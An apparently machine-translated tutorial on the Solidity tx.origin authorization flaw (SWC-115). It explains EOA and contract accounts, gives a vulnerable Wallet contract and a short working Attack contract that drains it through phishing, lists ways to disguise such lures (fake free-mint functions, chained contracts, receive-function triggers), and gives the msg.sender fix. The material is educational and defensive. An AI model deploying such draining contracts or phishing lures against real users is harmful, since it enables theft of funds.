In the contract code , The most common is to use msg.sender To check the authorization , But sometimes because some programmers are unfamiliar tx.origin and msg.sender The difference between , If used tx.origin May lead to contract safety problems . The most typical attack scenario for hackers is to use tx.origin Code problems are often combined with phishing attacks The way to attack .

tx.origin yes Solidity A global variable in , It returns the account address where the transaction was sent .

By calling tx.origin To check the authorization may lead to contract attack , because tx.origin Return the original sender of the transaction , Because the call chain of the attack may be the original sender －> Attack contracts －> Attacked contract . In the attacked contract ,tx.origin Is the original sender .

Pre knowledge

EOA Accounts and contract accounts

There are two kinds of Ethereum accounts , External accounts (EOA) And the contract account (SCA).

1. The external account is managed by a pair of public and private keys , The account contains Ether Balance of .
2. Contract accounts can contain Ether Outside the balance , It also has a specific piece of code , The preset code logic is called and processed when an external account or other contract sends a message to its contract address or a transaction occurs .

External accounts EOA

• Controlled by public and private key pairs
• Have ether balance
• Can send transaction （transactions）
• It does not contain relevant execution code

Contract account

• Have ether balance
• Contains execution code
• The code will only be executed when a transaction occurs at this contract address or when information sent by other contracts is received
• Have your own independent storage state , And other contracts can be called

msg.sender and tx.origin The difference between

tx.origin： Indicates the original caller , What we usually get is EOA The address of .

msg.sender： Indicates the most recent caller , Usually get the address of the superior caller , It can be EOA Address , It can also be the contract address .

If EOA user A Call contract B, contract B Call contract C. that

• stay C In contract ,msg.sender Namely B The address of the contract ,tx.origin by A Address .
• stay B In contract ,msg.sender yes A Address ,tx.origin Also for the A Address .

By judgment tx.origin==msg.sender To determine whether the caller is a contract or EOA Account .

reflection ： Can an account be distinguished by judging whether it contains execution code EOA still SCA?

Can not be . Because of a contract address CODESIZE Is greater than zero , But when the address CODESIZE When it's zero , There is no guarantee that it is non contractual , Because the contract is in the construction stage CODESIZE Also zero .

<aside>

</aside>

Vulnerability demonstration

The following vulnerability contract code , stay transfer The method is checked , The original intention is only owner Can be done transfer operation . What is used here is tx.origin==owner Inspection . We assume that Wallet The deployer of the contract is Alice.

contract Wallet {    address public owner;    constructor() payable {        owner = msg.sender;    }    function transfer(address payable _to, uint _amount) public {        require(tx.origin == owner, "Not owner");        (bool sent, ) = _to.call{value: _amount}("");        require(sent, "Failed to send Ether");    }}

hackers ( hypothesis Eve For hackers ) You can exploit vulnerabilities in this way .

1. Hackers write a Attack The contract of , And deploy .
2. Hackers induce by fishing and other means Wallet Deployer call of contract Attack The contract attack Method .
3. Hackers steal Wallet The contract ETH.

Attack Contract code

contract Attack {    address payable public owner;    Wallet wallet;    constructor(Wallet _wallet) {        wallet = Wallet(_wallet);        owner = payable(msg.sender);    }    function attack() public {        wallet.transfer(owner, address(wallet).balance);    }}

In the process ,Alice Called Attack The contract attack Method ,attack Method is called wallet The contract transfer Method , stay transfer In the method tx.origin yes alice( stay transfer In the method tx.sender yes attack contract ), because alice Namely Wallet The contract owner, So by testing , take ETH To hackers Eve.

There's another question ,Alice Would be stupid enough to call Eve The contract ？

This depends on hackers Eve Of go fishing The technique , If it's like the one above attack Method Alice Generally, I won't be fooled , But if the method name pretends to be free mint NFT Function of freemint, And a lot of other normal code is called in the code , And called other contracts C, stay C Call in the contract wallet.transfer, It may be difficult to recognize that there is a problem with this method . and Alice Use in normal life DAPP when ( If you use uniswap,stepn Isochronous ), The back end also adopts the form of calling contract methods , Compared with sending phishing emails by sending fake links directly ,Alice The vigilance to this kind of fishing will be lower .

therefore , Hackers are more likely to succeed in fishing , It can be enhanced from the following aspects

1. Multiple contract connections . contract A Call contract B, contract B Call contract C, contract C Call contract D,…………, Finally, the contract calls wallet.transfer.
2. Hackers' contracts can be used social engineering camouflage , Take advantage of the greed for cheap , Low price or free mint Banner , Or the temptation of high interest rates .
3. Hackers can hide exploits in receive function in , Trigger vulnerability exploitation by inducing users to transfer money to the specified contract . Such as pretending to exchange money with users , Give customers great discounts, inducements, etc .

Safety suggestion

In this case , Use msg.sender Instead of tx.origin. Make sure that the caller owner.

function transfer(address payable _to, uint256 _amount) public {  require(msg.sender == owner, "Not owner");  (bool sent, ) = _to.call{value: _amount}("");  require(sent, "Failed to send Ether");}

Reference resources

SWC-115 describe https://swcregistry.io/docs/SWC-115

In code tx.origin==msg.sender What's the role ？https://ethereum.stackexchange.com/questions/113962/what-does-msg-sender-tx-origin-actually-do-why

Use tx-origin go fishing https://solidity-by-example.org/hacks/phishing-with-tx-origin